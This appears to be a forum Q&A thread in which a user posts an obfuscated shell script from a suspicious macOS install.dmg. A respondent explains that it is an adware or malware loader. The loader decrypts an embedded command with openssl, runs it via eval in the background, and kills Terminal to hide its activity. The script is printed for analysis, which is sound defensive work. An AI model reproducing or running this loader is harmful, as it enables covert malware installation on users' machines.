

export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal


I got this from a shady install.dmg file that automatically downloaded. I obviously didn't run this so I thought I might ask you guys here.



Short answer: Do NOT run it. Kill it with fire, unless you're interested in analyzing it as malware.


It's an obfuscated malware installer script. The script itself is pretty generic, but there's another (encrypted) file in the same directory that's the real payload, and it's almost certainly malware. In fact this looks like a near-exact match for one I looked at a while ago. Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection.

说明:如果这与我之前看过的匹配,则该脚本旁边还有一个名为"2P1zsqQ"的文件.该文件名用作将 commandArgs 字符串解密为shell命令字符串的密码,该命令包含与/tmp/< somethingrandom>解密2P1zsqQ文件本身(使用相同的密码)的指令.;/Qqsz1P2 ,运行该(解密的)可执行文件,然后将其删除(此脚本会杀死Terminal应用程序,从而隐藏正在发生的事情).

Explanation: if this is a match for the one I looked at before, there's another file there named "2P1zsqQ" alongside this script. That filename is used as a password to decrypt the commandArgs string into a shell command string, which has instructions to decrypt the 2P1zsqQ file itself (with the same password) as /tmp/<somethingrandom>/Qqsz1P2, run that (decrypted) executable, and then delete it (while this script kills the Terminal app, thus hiding what's going on).


BTW, this question is about a similar malware installer script; maybe an earlier version with slightly less obfuscation.


09-03 03:26